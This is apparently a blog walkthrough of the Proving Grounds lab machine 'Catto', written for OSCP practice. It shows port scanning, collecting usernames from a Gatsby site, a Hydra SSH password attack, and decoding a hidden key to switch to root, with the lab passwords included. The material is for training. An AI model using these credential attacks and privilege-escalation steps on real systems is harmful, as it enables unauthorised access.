Proving grounds:Catto
3 min readOct 22, 2022
Today we will take a look at Proving grounds: Catto. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
8080/tcp open http nginx 1.14.1
|_http-title: Identity by HTML5 UP
|_http-server-header: nginx/1.14.1
18080/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
30330/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
33097/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
42022/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 cc:21:51:f2:c6:2a:ad:d6:ca:07:04:de:70:5f:fa:13 (RSA)
| 256 05:e4:90:d2:00:2b:9d:14:e3:9f:44:68:d2:8e:bc:dc (ECDSA)
|_ 256 ca:80:49:73:f0:c8:05:ae:bd:2b:42:37:1d:13:e0:71 (ED25519)
43821/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns:
| HTTP/1.1 400 Bad Request
|_ Connection: close
50400/tcp open http Node.js Express framework- 30330
http://192.168.249.139:30330/minecraft
“There is a limit on the server, but at least sabel, yvette, zahara, sybilla, marcus, tabbatha and tabby are already online and building.”
└─# nano user.txt
sabel
yvette
zahara
sybilla
marcus
tabbatha
tabbyBuilt with Gatsby
After seeing this post, I started researching about Gatsby. Gatsby applications in development mode provide a /_graphql interface.
Select allSitePage and click run.
http://192.168.249.139:30330/new-server-config-mc
- Hydra
hydra -L user.txt -p WallAskCharacter305 ssh://192.168.249.139:42022 -v[42022][ssh] host: 192.168.249.139 login: marcus password: WallAskCharacter305
- privesc(base64key)
[marcus@catto ~]$ cat .bash
F2jJDWaNin8pdk93RLzkdOTr60==[marcus@catto ~]$ echo “F2jJDWaNin8pdk93RLzkdOTr60==” | base64 -d
f��)vOwD��t���[marcus@catto ~]$[marcus@catto ~]$ find / -type f -name “*base64*” 2>/dev/null
/usr/bin/base64
/usr/bin/base64key[marcus@catto ~]$ /usr/bin/base64key -d F2jJDWaNin8pdk93RLzkdOTr60==
Usage: ./a.out message key (0:encrypt|1:decrypt)
./a.out “Hello world” MYPRIVATEKEY 0
./a.out ttz9JqxZHBClNtu= MYPRIVATEKEY 1[marcus@catto ~]$ /usr/bin/base64key F2jJDWaNin8pdk93RLzkdOTr60== WallAskCharacter305 1
SortMentionLeast269[marcus@catto ~]$ su -
Password:
[root@catto ~]# whoami
root
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
